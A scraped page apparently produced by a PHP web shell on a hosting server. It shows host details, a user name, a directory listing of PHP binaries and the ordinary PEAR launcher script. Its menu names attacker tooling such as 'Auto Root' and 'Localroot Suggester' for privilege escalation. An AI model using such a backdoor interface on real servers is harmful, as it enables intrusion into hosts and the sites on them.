Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
apps /
php74 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
fpmctl
2.38
KB
-rwxr-xr-x
2025-02-25 04:05
lsphp
29.86
MB
-rwxr-xr-x
2024-10-29 05:13
memcapable
276.02
KB
-rwxr-xr-x
2024-10-29 05:19
memcat
83.51
KB
-rwxr-xr-x
2024-10-29 05:19
memcp
82.75
KB
-rwxr-xr-x
2024-10-29 05:19
memdump
73.44
KB
-rwxr-xr-x
2024-10-29 05:19
memerror
63.76
KB
-rwxr-xr-x
2024-10-29 05:19
memexist
71.78
KB
-rwxr-xr-x
2024-10-29 05:19
memflush
70.82
KB
-rwxr-xr-x
2024-10-29 05:19
memparse
35.4
KB
-rwxr-xr-x
2024-10-29 05:19
memping
76.16
KB
-rwxr-xr-x
2024-10-29 05:19
memrm
72.78
KB
-rwxr-xr-x
2024-10-29 05:19
memslap
121.76
KB
-rwxr-xr-x
2024-10-29 05:19
memstat
92.59
KB
-rwxr-xr-x
2024-10-29 05:19
memtouch
72.16
KB
-rwxr-xr-x
2024-10-29 05:19
pear
872
B
-rwxr-xr-x
2024-10-29 05:13
peardev
893
B
-rwxr-xr-x
2024-10-29 05:13
pecl
806
B
-rwxr-xr-x
2024-10-29 05:13
phar
14.55
KB
-rwxr-xr-x
2024-10-29 05:13
phar.phar
14.55
KB
-rwxr-xr-x
2024-10-29 05:13
php
29.92
MB
-rwxr-xr-x
2024-10-29 05:13
php-cgi
29.82
MB
-rwxr-xr-x
2024-10-29 05:13
php-config
6.22
KB
-rwxr-xr-x
2024-10-29 05:13
phpdbg
30.65
MB
-rwxr-xr-x
2024-10-29 05:13
phpize
4.46
KB
-rwxr-xr-x
2024-10-29 05:13
Save
Rename
#!/bin/sh # first find which PHP binary to use if test "x$PHP_PEAR_PHP_BIN" != "x"; then PHP="$PHP_PEAR_PHP_BIN" else if test "/usr/local/apps/php74/bin/php" = '@'php_bin'@'; then PHP=php else PHP="/usr/local/apps/php74/bin/php" fi fi # then look for the right pear include dir if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then INCDIR=$PHP_PEAR_INSTALL_DIR INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR" else if test "/usr/local/apps/php74/lib/php" = '@'php_dir'@'; then INCDIR=`dirname $0` INCARG="" else INCDIR="/usr/local/apps/php74/lib/php" INCARG="-d include_path=/usr/local/apps/php74/lib/php" fi fi exec $PHP -d date.timezone=UTC -d memory_limit="-1" -C -q $INCARG -d output_buffering=1 -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d variables_order=EGPCS -d auto_append_file="" $INCDIR/pearcmd.php "$@"